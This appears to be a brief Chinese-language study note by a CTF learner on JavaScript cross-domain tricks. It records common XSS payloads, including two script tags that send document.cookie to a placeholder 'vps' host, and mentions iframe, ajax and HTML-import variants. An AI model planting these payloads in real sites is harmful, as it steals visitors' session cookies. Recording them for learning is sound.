学习 | js跨域
这个题目很虚…我其实不是很懂…
我先记录一下不懂得东西, 以后也许会懂
只是看到题目中常用的payload
<script>window.open('http://vps/xx.php?cookie=' + document.cookie); </script>
<script>window.location.href = 'http://vps/xx.php?cookie=' + document.cookie; </script>
还有建一个iframe的, 建一个a标签, click一下的, 还有import的, 还有ajax来open一下的
在什么情况下ajax可以用file协议读本地文件
emmmmmm, 还有一些知识, 比如
<link rel="import" href="data:text/html;base64, xxxyyy">